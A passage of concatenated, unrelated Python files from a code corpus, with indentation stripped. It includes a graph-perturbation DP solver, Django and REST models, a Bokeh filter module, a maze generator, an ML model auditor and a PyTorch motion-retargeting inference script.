for t in range(1, nG+1):
st_1, st, at = s[t-1], s[t], a[t]
for j in range(0,c[t]+1):
m = np.inf
for k in range(max(0, j-c[t-1]), min(j, delta_l[t-1])+1):
m = min(st_1[j-k]+at[k], m) # accessing s seems costly
st[j] = m
# ---------------------SECOND LOOP---------------------
A_pert = np.zeros((nG,nG))
j = np.argmin(s[nG]) # this sort takes nG*delta_l log(nG*delta_l)
opt_val = s[nG][j]
unpert_val = s[nG][0]
for t in range(nG,0,-1):
temp = np.ones(delta_l[t-1]+1)*np.inf
st_1, at = s[t-1], a[t]
for k in range(max(0, j-c[t-1]), min(j, delta_l[t-1])+1):
temp[k] = st_1[j-k] + at[k]
kt = np.argmin(temp)
j = j - kt
A_pert[t-1,:] = get_A_opt(Q[t-1], A_org[t-1], L[t-1], \
t, kt, add_edge_matrix[t][kt])
sol = (unpert_val, opt_val, A_pert)
return sol
@njit("(float64[:,:], float64[:,:], float64[:], float64[:,:], int64[:], int64)", cache=True)
def local_budget_solver(A_org, Q, p, L, delta_l, delta_g):
max_delta_l = max(delta_l)
a, add_edge_matrix = local_budget_precompute(A_org, Q, p, L, max_delta_l)
nG = A_org.shape[0]
A_pert = np.zeros((nG,nG))
opt_fvals = np.zeros(nG)
for i in range(nG):
delta_l_i = delta_l[i]
best_delta_l = np.argmin(a[i+1][0:(delta_l_i+1)])
A_pert[i] = get_A_opt(Q[i], A_org[i], L[i], i+1, best_delta_l, \
add_edge_matrix[i+1][best_delta_l])
opt_fvals[i] = a[i+1][best_delta_l]
sol = (a[:, 0], opt_fvals, A_pert)
return sol
def po_dp_solver(A_org, R, delta_l, delta_g):
nG = A_org.shape[0]
# precomputing a matrix
J = R*(-2*A_org + 1)
a = po_local_solver(J, nG, delta_l)
A_pert = np.zeros((nG,nG))
V_pert = np.zeros((nG,nG))
c, s = first_loop(a, delta_l, delta_g)
j = np.argmin(s[nG])
unpert_val = s[nG][0]
opt_val = s[nG][j]
for t in range(nG,0,-1):
temp = np.ones(delta_l+1)*np.inf
st_1, at = s[t-1], a[t]
for k in range(max(0, j-c[t-1]), min(j, delta_l)+1):
temp[k] = st_1[j-k] + at[k]
kt = np.argmin(temp)
j = j - kt
V_pert[t-1,:] = optVt_from_a_tj(J[t-1, :], t, kt, delta_l)
A_pert[t-1,:] = ((2*A_org[t-1, :] - 1)*(-2*V_pert[t-1,:]+1)+1)/2
return A_pert
def po_local_solver(J, nG, delta_l):
a = np.zeros((nG+1, delta_l+1))
for i in range(1, nG+1): # looping each row of A
J_i = J[i-1, :].copy()
J_i = -np.delete(J_i, i-1)
indices = np.argsort(J_i)
for j in range(1,delta_l+1): # looping each possible local constraints
a[i,j] = J_i[indices[j-1]] + a[i,j-1]
return a
def optVt_from_a_tj(J_t, t, j, delta_l):
V = np.zeros(J_t.shape)
indices = np.argsort(-J_t)
changed_edges = 0
for i in range(j+1):
if indices[i] == t-1: continue
V[indices[i]] = 1
changed_edges += 1
if changed_edges >= j: break
return V
| nilq/baby-python | python |
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
# Create your models here.
class UserProfileManager(BaseUserManager):
"""Manager for User Profile Model"""
def create_user(self, email, name, mobile_no, password=None, is_supervisor=False, is_gaurd=False):
"""Create new user profile"""
if not email:
raise ValueError("User must have email address")
email = self.normalize_email(email)
user = self.model(email=email,name=name,mobile_no=mobile_no,is_supervisor=is_supervisor,is_gaurd=is_gaurd)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, name, mobile_no, password):
"""Create and Save New SuperUser with given Details"""
user = self.create_user(email, name, mobile_no, password)
user.is_superuser = True
user.is_staff = True
user.is_supervisor = True
user.is_gaurd = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser, PermissionsMixin):
"""Database model for users in the System"""
id = models.AutoField(primary_key=True)
email = models.EmailField(max_length=255,unique=True)
name = models.CharField(max_length=255)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
mobile_no = models.CharField(max_length=12)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
is_supervisor = models.BooleanField(default=False)
is_gaurd = models.BooleanField(default=False)
is_demo_account = models.BooleanField(default=False)
objects = UserProfileManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name','mobile_no']
def get_full_name(self):
"""Retrieve Full Name of User"""
return self.first_name+' '+self.last_name
def get_short_name(self):
"""Retrieve Short Name of User"""
return self.name
def get_contact_details(self):
"""Retrieve Contact Details of the User"""
return 'Email ID: {} Mobile No: {}'.format(self.email, self.mobile_no)
def __str__(self):
"""Return Representation of User"""
return self.email
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from unittest import TestCase
import os
from auxlib.packaging import get_version
# from auxlib.packaging import (_get_version_from_pkg_info, _is_git_dirty, _get_most_recent_git_tag,
# _get_git_hash, is_git_repo)
# from auxlib.path import ROOT_PATH
# class TestPackaging(TestCase):
#
# def test_version_string(self):
# try:
# test_version = str(random.randint(0,1e6))
# with open('.version', 'w') as f:
# f.write(test_version)
# assert _get_version_from_pkg_info('tests') == test_version
# finally:
# if os.path.exists('.version'):
# os.remove('.version')
#
# def test_is_git_dirty(self):
# result = _is_git_dirty(os.getcwd())
# assert result is True or result is False
#
#
# def test_get_git_hash(self):
# hash = _get_git_hash(os.getcwd())
# assert len(hash) == 7
#
# def test_not_git_repo(self):
# assert not is_git_repo(ROOT_PATH)
class TestPackagingNotGitRepo(TestCase):
def setUp(self):
super(TestPackagingNotGitRepo, self).setUp()
self.cwd = os.getcwd()
os.chdir('/')
def tearDown(self):
super(TestPackagingNotGitRepo, self).tearDown()
os.chdir(self.cwd)
def test_get_most_recent_git_tag_no_repo(self):
tag = get_version(os.getcwd())
assert tag is None
| nilq/baby-python | python |
from rest_framework import serializers
from daily_tracker.models import Attandance
class AttandanceSerializer(serializers.HyperlinkedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='api:attandance-detail')
class Meta:
model = Attandance
fields = ('id', 'enter_at', 'out_at', 'total_time', 'url')
| nilq/baby-python | python |
import numpy as num
from decimal import *
import scipy as sci
from numpy.polynomial import polynomial as pol
def euler(f,a,b,n ,y_0):
h=Decimal((b-a))/Decimal(n)
vals = []
vals.append(y_0)
print ("Indice\t | t | Aproximado(u) ")
print("0\t | 0 |\t"+str(y_0))
for i in range (0, n-1):
tj =Decimal(a+(i)*h)
x = vals[i] + h*f(tj,Decimal(vals[i]))
vals.append(x)
print(str(i+1)+"\t | "+str(tj)+" |"+"\t"+str(x))
"""print("u_",i+1,"=",x)"""
def f(t,x):
return -x + t + 1
f0 = 1
euler(f,0,1,10,f0)
| nilq/baby-python | python |
from __future__ import absolute_import
import inspect
from textwrap import dedent
from types import FunctionType
from ..core.properties import Bool, Dict, Either, Int, Seq, String, AnyRef
from ..model import Model
from ..util.dependencies import import_required
from ..util.compiler import nodejs_compile, CompilationError
class Filter(Model):
''' A Filter model represents a filtering operation that returns a row-wise subset of
data when applied to a ColumnDataSource.
'''
filter = Either(Seq(Int), Seq(Bool), help="""
A list that can be either integer indices or booleans representing a row-wise subset of data.
""")
def __init__(self, *args, **kw):
if len(args) == 1 and "filter" not in kw:
kw["filter"] = args[0]
super(Filter, self).__init__(**kw)
class IndexFilter(Filter):
''' An IndexFilter filters data by returning the subset of data at a given set of indices.
'''
indices = Seq(Int, help="""
A list of integer indices representing the subset of data to select.
""")
def __init__(self, *args, **kw):
if len(args) == 1 and "indices" not in kw:
kw["indices"] = args[0]
super(IndexFilter, self).__init__(**kw)
class BooleanFilter(Filter):
''' A BooleanFilter filters data by returning the subset of data corresponding to indices
where the values of the booleans array is True.
'''
booleans = Seq(Bool, help="""
A list of booleans indicating which rows of data to select.
""")
def __init__(self, *args, **kw):
if len(args) == 1 and "booleans" not in kw:
kw["booleans"] = args[0]
super(BooleanFilter, self).__init__(**kw)
class GroupFilter(Filter):
''' A GroupFilter represents the rows of a ColumnDataSource where the values of the categorical
column column_name match the group variable.
'''
column_name = String(help="""
The name of the column to perform the group filtering operation on.
""")
group = String(help="""
The value of the column indicating the rows of data to keep.
""")
def __init__(self, *args, **kw):
if len(args) == 2 and "column_name" not in kw and "group" not in kw:
kw["column_name"] = args[0]
kw["group"] = args[1]
super(GroupFilter, self).__init__(**kw)
class CustomJSFilter(Filter):
''' Filter data sources with a custom defined JavaScript function.
.. warning::
The explicit purpose of this Bokeh Model is to embed *raw JavaScript
code* for a browser to execute. If any part of the code is derived
from untrusted user inputs, then you must take appropriate care to
sanitize the user input prior to passing to Bokeh.
'''
@classmethod
def from_py_func(cls, func):
''' Create a CustomJSFilter instance from a Python function. The
fucntion is translated to JavaScript using PScript.
The ``func`` function namespace will contain the variable ``source``
at render time. This will be the data source associated with the CDSView
that this filter is added to.
'''
if not isinstance(func, FunctionType):
raise ValueError('CustomJSFilter.from_py_func only accepts function objects.')
pscript = import_required(
'pscript',
dedent("""\
To use Python functions for CustomJSFilter, you need PScript
'("conda install -c conda-forge pscript" or "pip install pscript")""")
)
argspec = inspect.getargspec(func)
default_names = argspec.args
default_values = argspec.defaults or []
if len(default_names) - len(default_values) != 0:
raise ValueError("Function may only contain keyword arguments.")
# should the following be all of the values need to be Models?
if default_values and not any(isinstance(value, Model) for value in default_values):
raise ValueError("Default value must be a plot object.")
func_kwargs = dict(zip(default_names, default_values))
code = pscript.py2js(func, 'filter') + 'return filter(%s);\n' % ', '.join(default_names)
return cls(code=code, args=func_kwargs)
@classmethod
def from_coffeescript(cls, code, args={}):
''' Create a CustomJSFilter instance from CoffeeScript snippets.
The function bodies are translated to JavaScript functions using node
and therefore require return statements.
The ``code`` function namespace will contain the variable ``source``
at render time. This will be the data source associated with the CDSView
that this filter is added to.
'''
compiled = nodejs_compile(code, lang="coffeescript", file="???")
if "error" in compiled:
raise CompilationError(compiled.error)
else:
return cls(code=compiled.code, args=args)
args = Dict(String, AnyRef, help="""
A mapping of names to Python objects. In particular those can be bokeh's models.
These objects are made available to the callback's code snippet as the values of
named parameters to the callback.
""")
code = String(default="", help="""
A snippet of JavaScript code to filter data contained in a columnar data source.
The code is made into the body of a function, and all of of the named objects in
``args`` are available as parameters that the code can use. The variable
``source`` will contain the data source that is associated with the CDSView this
filter is added to.
The code should either return the indices of the subset or an array of booleans
to use to subset data source rows.
Example:
.. code-block:: javascript
code = '''
var indices = [];
for (var i = 0; i <= source.data['some_column'].length; i++){
if (source.data['some_column'][i] == 'some_value') {
indices.push(i)
}
}
return indices;
'''
.. note:: Use ``CustomJS.from_coffeescript()`` for CoffeeScript source code.
""")
use_strict = Bool(default=False, help="""
Enables or disables automatic insertion of ``"use strict";`` into ``code``.
""")
| nilq/baby-python | python |
import random
import sys
def room(map, times, max, min):
# map
width = len(map)
height = len(map[0])
# Storage generated rooms
rooms = []
for i in range(times):
sp = (random.randint(0, int((width-1)/2))*2+1,
random.randint(0, int((height-1)/2))*2+1)
length = random.randint(int(min/2), int(max/2))*2+1
room = (sp, length)
rooms.append(room)
# check if intersect
'''for r in rooms:
point = r[0]
l = r[1]
if sp[0]
'''
for r in rooms:
for i in range(r[0][0], r[0][0]+r[1]):
for j in range(r[0][1], r[0][1]+r[1]):
if 0 < i and i < width-1 and 0 < j and j < height-1:
map[i][j] = 4
return rooms
def open_door(map, rooms, door_ratio):
# map
width = len(map)
height = len(map[0])
for room in rooms:
# check each walls
isHasOneDoor = False
# top
for y in range(room[0][1], room[0][1]+room[1]):
x = room[0][0]-1
if 0 <= y and y <= height-1 and 0 <= x and x <= width-1 and x-1 >= 0 and map[x-1][y] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
# down
for y in range(room[0][1], room[0][1]+room[1]):
x = room[0][0]+room[1]+1
if 0 <= y and y <= height-1 and 0 <= x and x <= width-1 and x+1 <= width-1 and map[x+1][y] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
# left
for x in range(room[0][0], room[0][0]+room[1]):
y = room[0][0]-1
if 0 <= x and x <= width-1 and 0 <= y and y <= height-1 and y-1 >= 0 and map[x][y-1] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
# right
for x in range(room[0][0], room[0][0]+room[1]):
y = room[0][0]+room[1]+1
if 0 <= x and x <= width-1 and 0 <= y and y <= height-1 and y+1 <= width-1 and map[x][y+1] == 2:
if random.random() > (1-door_ratio) or not isHasOneDoor:
map[x][y] = 2
isHasOneDoor = True
def maze(height, width, rooms_count, room_max_length, room_min_length, door_ratio):
# 0 unvisited road
# 1 unvisited wall
# 2 visited road
# 3 visited wall
# 4 room district
# Generate maze map
map = [[1 for i in range(height)] for i in range(width)]
for i in range(1, width):
for j in range(1, height-1):
if j % 2 != 0 and i % 2 != 0:
map[i][j] = 0
# shuffle some rooms
rooms = room(map, rooms_count, room_max_length, room_min_length)
# shuffle a start point
sp = (random.randint(0, width-1), random.randint(0, height-1))
while map[sp[0]][sp[1]] != 0:
sp = (random.randint(0, width-1), random.randint(0, height-1))
point_list = []
# Start
map[sp[0]][sp[1]] = 2
point_list.append((sp[0]-1, sp[1], sp))
point_list.append((sp[0], sp[1]-1, sp))
point_list.append((sp[0]+1, sp[1], sp))
point_list.append((sp[0], sp[1]+1, sp))
# Loop for generation
while len(point_list) > 0:
# shuffle a point in list
point = point_list[random.randint(0, len(point_list)-1)]
# check shuffle availability
if not (0 <= point[0] and point[0] <= width-1 and 0 <= point[1] and point[1] <= height-1):
point_list.remove(point)
continue
# expand
road = point[2]
check_point = (point[0]-road[0]+point[0],
point[1]-road[1]+point[1])
if (0 <= check_point[0] and check_point[0] <= width-1 and 0 <= check_point[1] and check_point[1] <= height-1) and map[check_point[0]][check_point[1]] == 0:
map[check_point[0]][check_point[1]] = 2
map[point[0]][point[1]] = 2
# add around points of check_point
if check_point[0] >= 0 and map[check_point[0]-1][check_point[1]] == 1:
point_list.append(
(check_point[0]-1, check_point[1], check_point))
if check_point[0] <= width-1 and map[check_point[0]+1][check_point[1]] == 1:
point_list.append(
(check_point[0]+1, check_point[1], check_point))
if check_point[1] >= 0 and map[check_point[0]][check_point[1]-1] == 1:
point_list.append(
(check_point[0], check_point[1]-1, check_point))
if check_point[1] <= height-1 and map[check_point[0]][check_point[1]+1] == 1:
point_list.append(
(check_point[0], check_point[1]+1, check_point))
# remove from list
point_list.remove(point)
# open door in room walls
open_door(map, rooms, door_ratio)
# output
for x in map:
for y in x:
if y == 0 or y == 2 or y == 4:
print(' ', end='')
else:
print('▉', end='')
print()
print()
args = sys.argv[1:]
maze(int(args[0]), int(args[1]), int(args[2]),
int(args[3]), int(args[4]), int(args[5]))
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""Main module."""
import warnings
from collections import Counter
from math import sqrt
import mlprimitives
import numpy as np
from mlblocks import MLPipeline
from scipy.stats import entropy
from sklearn import metrics
from sklearn.model_selection import KFold
from sklearn.neighbors import NearestNeighbors
import pandas as pd
from cardea.modeling.modeler import Modeler
class ModelAuditor():
__name__ = 'ModelAuditor'
def run_fold(self, features_train, target, feature_test, primitive, hyperparameters=None):
'''Runs Kfold cross-validation where it predicts all the primitives within the pipeline.
Args:
features_train: the training features.
features_test: the testing features.
target: a list of the folds targets.
primitive: the machine learning primitive to run.
hyperparameters: the hyperparameters of the given primitives.
Returns:
A list of the folds' results for the primitives that are passed.
'''
# assert that the features and targets have the same size
modeler = Modeler()
#pipeline = self.create_pipeline(primitive, hyperparameters)
pipeline = modeler.create_pipeline(primitive, hyperparameters)
last_block_in_pipeline = list(pipeline.blocks.values())[-1]
#Add an if statement based on the type of output for the last block (array, ndarray, DataFrame)
for output in last_block_in_pipeline.produce_output:
check_name = output['name'] == 'X' or output['name'] == 'y'
check_numpy = output['type'] == 'array' or output['type'] == 'ndarray'
check_pandas = output['type'] == 'DataFrame' or output['type'] == 'Series'
if check_name and (check_numpy or check_pandas):
features_train = pd.DataFrame(features_train)
feature_test = pd.DataFrame(feature_test)
target = pd.Series(target)
return modeler.fit_predict_model(features_train, target, feature_test, pipeline)
return None
def generate_kfolds(self, features, target, n_folds=10):
'''Creates Kfold cross-validation for the given features and targets
Args:
features: The features as a numpy array to create the k-folds for
target: a list of the folds targets
n_folds: the number of folds to create
Returns:
a tuple that consist of two values, the folds features and the folds targets
'''
kf = KFold(n_splits=n_folds, shuffle=True)
folds_features = []
folds_targets = []
for train_index, test_index in kf.split(features):
X_train = features[train_index]
X_test = features[test_index]
y_train = target[train_index]
y_test = target[test_index]
folds_features.append([X_train, X_test])
folds_targets.append([y_train, y_test])
return folds_features, folds_targets
def execute_pipeline(self, pipeline_primitives, features_train, target,
features_test, problem_type, hyperparameters = None,
with_intermediate = False):
'''Executes a pipeline and generates all the intermediates of the pipeline.
Args:
pipeline_primitives: Array of the pipeline primitives.
features_train: the training features data to run through the pipeline.
features_test: the testing features data to run through the pipeline.
target: The target of the training data to run through the pipeline.
problem_type: the type of the problem (classification or regression).
hyperparameters: the hyperparameters to run for the model
with_intermediate: A boolean to add or ignore the intermediates metrics.
Returns:
a tuple that consist of three values,the intermediates,
the folds features and the folds targets.
'''
pipeline_intermediates = []
if with_intermediate:
all_partial_primitives = [pipeline_primitives[:index] for index in range(1,len(pipeline_primitives) + 1)]
else:
all_partial_primitives = [pipeline_primitives]
for partial_primitives in all_partial_primitives:
pipeline_results = self.run_fold(features_train, target,
features_test, partial_primitives,
hyperparameters)
#if pipeline_results != None:
pipeline_intermediates.append(pipeline_results)
return pipeline_intermediates
def report_regression_result(self, actual, predicted):
'''Reports the prediction results for a regression model.
Args:
actual: A 1d list of the target variable for the actual test data.
predicted: A 1d list of the prediction result.
Returns:
A json object of various evaluation metrics for regression.
'''
metrics_to_calculate = [['explained_variance_score', metrics.explained_variance_score],
['mean_absolute_error', metrics.mean_absolute_error],
['mean_squared_error', metrics.mean_squared_error],
['mean_squared_log_error', metrics.mean_squared_log_error],
['median_absolute_error', metrics.median_absolute_error],
['r2_score', metrics.r2_score]]
results_dict = {}
for metric in metrics_to_calculate:
try:
results_dict[metric[0]] = metric[1](actual, predicted)
except BaseException:
warnings.warn(
'{} can\'t be calculated for this data'.format(metric[0]),
UserWarning)
return results_dict
def report_classification_result(self, actual, predicted):
'''Reports the prediction results for a classification model.
Args:
actual: A 1d list of the target variable for the actual test data.
predicted: A 1d list of the prediction result.
n_class: Int of the number of classes in the classification problem.
prediction_proba: The classes prediction probabilities that are
produced by predict_proba.
Returns:
A json object of various evaluation metrics for classification.
'''
metrics_to_calculate = [['accuracy', metrics.accuracy_score],
['f1', metrics.f1_score],
['precision', metrics.precision_score],
['recall', metrics.recall_score],
['class_count', Counter]]
results_dict = {}
for metric in metrics_to_calculate:
try:
if metric[0] == 'accuracy':
results_dict[metric[0]] = metric[1](actual, predicted)
elif metric[0] == 'class_count':
counter_dict = metric[1](predicted)
label_count_sum = sum(counter_dict.values())
for label in counter_dict.keys():
results_dict['{}_{}'.format(metric[0], str(
label))] = counter_dict[label] / label_count_sum
else:
results_dict['{}_macro'.format(metric[0])] = metric[1](
actual, predicted, average='macro')
except BaseException:
warnings.warn(
'{} can\'t be calculated for this data'.format(metric[0]),
UserWarning)
return results_dict
def euclidean_distance(self, x, y):
'''Computes the euclidean distance between two vectors.
Args:
x: The first vector.
y: The second vector.
Returns:
The euclidean distance.
'''
return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))
def intermediate_metrics(self, intermediate):
'''Generates metrics of the intermediates (features data in-between primitives).
Args:
intermediate: The intermediate data that must be investigated (for a single fold).
Returns:
A Summary metrics for the different data columns in the intermediate.
'''
if type(intermediate) != pd.DataFrame:
intermediate = pd.DataFrame(intermediate)
summary = {}
for column_name in list(intermediate.columns):
intermediate_column = intermediate[column_name]
col_metrics = {}
col_metrics['index'] = column_name
col_metrics['perc_25'] = np.percentile(intermediate_column, 25)
col_metrics['perc_50'] = np.percentile(intermediate_column, 50)
col_metrics['perc_75'] = np.percentile(intermediate_column, 75)
col_metrics['variance'] = np.var(intermediate_column)
col_metrics['std'] = np.std(intermediate_column)
col_metrics['entropy'] = entropy(intermediate_column)
summary[column_name] = col_metrics
return summary
def find_k_nearest_neighbors(self, data, instance, k=5):
'''Finds the k-nearest neighbors from the data to an instance.
Args:
data: The data that will be searched to find the nearest neighbors.
instance: the instance that needs to identify its nearest neighbors.
k: the number of nearest neighbors to consider.
Returns:
Array of the k nearest neighbors to the instance.
'''
nbrs = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(data)
distances, indices = nbrs.kneighbors([instance])
return data[indices]
def summarize_nearest_neighbors(self, folds_features, folds_targets, k=5):
'''Summarizes the nearest neighbors of a sample in the data.
Args:
folds_features: The folds containing the training and testing of the features data.
folds_targets: The folds containing the training and testing of the target data.
k: the number of nearest neighbors to consider
Returns:
Summary of all the features for the nearest neighbors.
'''
nearest_neighbors_summary = []
for x, y in zip(folds_features, folds_targets):
X_train = x[0]
X_test = x[1]
y_test = y[1]
indices_to_select = np.random.choice(range(len(X_test)), k, replace=False)
chosen_instances_features = X_test[indices_to_select]
chosen_instances_targets = y_test[indices_to_select]
fold_nearest_neighbors_summary = []
for instance_features, instance_target in zip(
chosen_instances_features, chosen_instances_targets):
nearest_neighbors = self.find_k_nearest_neighbors(X_train, instance_features, k)
neighbors_summary = self.intermediate_metrics(nearest_neighbors)
fold_nearest_neighbors_summary.append({'instance_features': instance_features,
'instance_target': instance_target,
'neighbors_summary': neighbors_summary})
nearest_neighbors_summary.append(fold_nearest_neighbors_summary)
return nearest_neighbors_summary
def generate_pipeline_report(self, pipeline_primitives, features,
target, problem_type, hyperparameters = None,
with_intermediates_metrics = False,
with_nearest_neighbors = False):
'''Generates the full report of the model auditor in a json format.
Args:
pipeline_primitives: Array of the pipeline primitives to run.
features: The features data to run through the pipeline.
target: The target data to run through the pipeline.
problem_type: The type of the problem (classification or regression).
hyperparameters: Specify parameters that must be specified in the primitives.
with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.
with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.
Returns:
A json file of the model auditing results.
'''
report = {}
# Generate the folds
columns_names = list(features.columns)
features = np.array(features)
target = np.array(target)
folds_features, folds_targets = self.generate_kfolds(features, target)
# create the intermediates
intermediates_list = []
for x, y in zip(folds_features, folds_targets):
X_train = pd.DataFrame(x[0],columns = columns_names)
X_test = pd.DataFrame(x[1],columns = columns_names)
y_train = y[0]
fold_intermediates_list = self.execute_pipeline(pipeline_primitives, X_train,
y_train, X_test, problem_type,
with_intermediate = with_intermediates_metrics,
hyperparameters = hyperparameters)
intermediates_list.append(fold_intermediates_list)
# print(intermediates_list)
output_result = []
if problem_type == 'classification':
for actual, predicted in zip(folds_targets, intermediates_list):
fold_result = self.report_classification_result(actual[1], predicted[-1])
output_result.append(fold_result)
elif problem_type == 'regression':
for actual, predicted in zip(folds_targets, intermediates_list):
fold_result = self.report_regression_result(actual[1], predicted[-1])
output_result.append(fold_result)
report['output_result'] = output_result
if with_intermediates_metrics:
intermediates_metrics = {}
for fold in intermediates_list:
for idx,intermediate in enumerate(fold[:-1]):
intermediate_key = str(idx)+ '.' + pipeline_primitives[idx]
try:
intermediate_result = self.intermediate_metrics(intermediate)
intermediates_metrics[intermediate_key] = intermediate_result
except BaseException as e:
print(e.args)
warnings.warn(
'intermediate metrics can\'t be calculated for {}'.format(intermediate_key),
UserWarning)
report['intermediates_result'] = intermediates_metrics
if with_nearest_neighbors:
nearest_neighbors = self.summarize_nearest_neighbors(folds_features, folds_targets, k=5)
report['nearest_neighbors'] = nearest_neighbors
return report
def generate_pipeline_report_with_test(self, pipeline_primitives, features,
target, test, actual, problem_type, hyperparameters = None,
with_intermediates_metrics = False,
with_nearest_neighbors = False):
'''Generates the full report of the model auditor in a json format.
Args:
pipeline_primitives: Array of the pipeline primitives to run.
features: The features data to run through the pipeline.
target: The target data to run through the pipeline.
problem_type: The type of the problem (classification or regression).
hyperparameters: Specify parameters that must be specified in the primitives.
with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.
with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.
Returns:
A json file of the model auditing results.
'''
report = {}
# Generate the folds
columns_names = list(features.columns)
X_train = np.array(features)
y_train = np.array(target)
X_test = np.array(test)
y_test = np.array(actual)
# print("X_train ", X_train.shape)
# print("y_train ", y_train.shape)
# print("X_test ", X_test.shape)
# print("y_test ", y_test.shape)
y_pred = self.execute_pipeline(pipeline_primitives, X_train, y_train, X_test, problem_type,
with_intermediate=False,
hyperparameters=hyperparameters)
output_result = []
if problem_type == 'classification':
fold_result = self.report_classification_result(y_test, y_pred[-1])
output_result.append(fold_result)
elif problem_type == 'regression':
fold_result = self.report_regression_result(y_test, y_pred[-1])
output_result.append(fold_result)
report['output_result'] = output_result
if with_nearest_neighbors:
nearest_neighbors = self.summarize_nearest_neighbors(X_test, y_test, k=5)
report['nearest_neighbors'] = nearest_neighbors
return report
| nilq/baby-python | python |
import torch
import torch.nn as nn
import torch.optim as optim
import torch_geometric.transforms as transforms
from torch_geometric.data import Data, Batch
from tensorboardX import SummaryWriter
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import mpl_toolkits.mplot3d.axes3d as p3
import numpy as np
import h5py
import argparse
import logging
import time
import os
import copy
from datetime import datetime
import dataset
from dataset import Normalize, parse_h5
from models import model
from models.loss import CollisionLoss, JointLimitLoss, RegLoss
from train import train_epoch
from utils.config import cfg
from utils.util import create_folder
# Argument parse
parser = argparse.ArgumentParser(description='Inference with trained model')
parser.add_argument('--cfg', default='configs/inference/yumi.yaml', type=str, help='Path to configuration file')
args = parser.parse_args()
# Configurations parse
cfg.merge_from_file(args.cfg)
cfg.freeze()
print(cfg)
# Create folder
create_folder(cfg.OTHERS.SAVE)
create_folder(cfg.OTHERS.LOG)
create_folder(cfg.OTHERS.SUMMARY)
# Create logger & tensorboard writer
logging.basicConfig(level=logging.INFO, format="%(message)s", handlers=[logging.FileHandler(os.path.join(cfg.OTHERS.LOG, "{:%Y-%m-%d_%H-%M-%S}.log".format(datetime.now()))), logging.StreamHandler()])
logger = logging.getLogger()
writer = SummaryWriter(os.path.join(cfg.OTHERS.SUMMARY, "{:%Y-%m-%d_%H-%M-%S}".format(datetime.now())))
# Device setting
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
if __name__ == '__main__':
# Load data
pre_transform = transforms.Compose([Normalize()])
test_data, l_hand_angle, r_hand_angle= parse_h5(filename=cfg.INFERENCE.MOTION.SOURCE, selected_key=cfg.INFERENCE.MOTION.KEY)
test_data = [pre_transform(data) for data in test_data]
indices = [idx for idx in range(0, len(test_data), cfg.HYPER.BATCH_SIZE)]
test_loader = [test_data[idx: idx+cfg.HYPER.BATCH_SIZE] for idx in indices]
test_target = sorted([target for target in getattr(dataset, cfg.DATASET.TEST.TARGET_NAME)(root=cfg.DATASET.TEST.TARGET_PATH)], key=lambda target : target.skeleton_type)
hf = h5py.File(os.path.join(cfg.INFERENCE.H5.PATH, 'source.h5'), 'w')
g1 = hf.create_group('group1')
source_pos = torch.stack([data.pos for data in test_data], dim=0)
g1.create_dataset('l_joint_pos_2', data=source_pos[:, :3])
g1.create_dataset('r_joint_pos_2', data=source_pos[:, 3:])
hf.close()
print('Source H5 file saved!')
# Create model
model = getattr(model, cfg.MODEL.NAME)().to(device)
# Load checkpoint
if cfg.MODEL.CHECKPOINT is not None:
model.load_state_dict(torch.load(cfg.MODEL.CHECKPOINT))
# store initial z
model.eval()
z_all = []
for batch_idx, data_list in enumerate(test_loader):
for target_idx, target in enumerate(test_target):
# fetch target
target_list = [target for data in data_list]
# forward
z = model.encode(Batch.from_data_list(data_list).to(device)).detach()
# z = torch.empty(Batch.from_data_list(target_list).x.size(0), 64).normal_(mean=0, std=0.005).to(device)
z.requires_grad = True
z_all.append(z)
# Create loss criterion
# end effector loss
ee_criterion = nn.MSELoss() if cfg.LOSS.EE else None
# vector similarity loss
vec_criterion = nn.MSELoss() if cfg.LOSS.VEC else None
# collision loss
col_criterion = CollisionLoss(cfg.LOSS.COL_THRESHOLD) if cfg.LOSS.COL else None
# joint limit loss
lim_criterion = JointLimitLoss() if cfg.LOSS.LIM else None
# end effector orientation loss
ori_criterion = nn.MSELoss() if cfg.LOSS.ORI else None
# regularization loss
reg_criterion = RegLoss() if cfg.LOSS.REG else None
# Create optimizer
optimizer = optim.Adam(z_all, lr=cfg.HYPER.LEARNING_RATE)
best_loss = float('Inf')
best_z_all = copy.deepcopy(z_all)
best_cnt = 0
start_time = time.time()
# latent optimization
for epoch in range(cfg.HYPER.EPOCHS):
train_loss = train_epoch(model,
ee_criterion, vec_criterion, col_criterion, lim_criterion, ori_criterion, reg_criterion,
optimizer,
test_loader, test_target,
epoch, logger, cfg.OTHERS.LOG_INTERVAL, writer, device, z_all)
# Save model
if train_loss > best_loss:
best_cnt += 1
else:
best_cnt = 0
best_loss = train_loss
best_z_all = copy.deepcopy(z_all)
if best_cnt == 5:
logger.info("Interation Finished")
break
print(best_cnt)
# store final results
model.eval()
pos_all = []
ang_all = []
for batch_idx, data_list in enumerate(test_loader):
for target_idx, target in enumerate(test_target):
# fetch target
target_list = [target for data in data_list]
# fetch z
z = best_z_all[batch_idx]
# forward
target_ang, target_pos, _, _, _, _, target_global_pos = model.decode(z, Batch.from_data_list(target_list).to(z.device))
pos_all.append(target_global_pos)
ang_all.append(target_ang)
if cfg.INFERENCE.H5.BOOL:
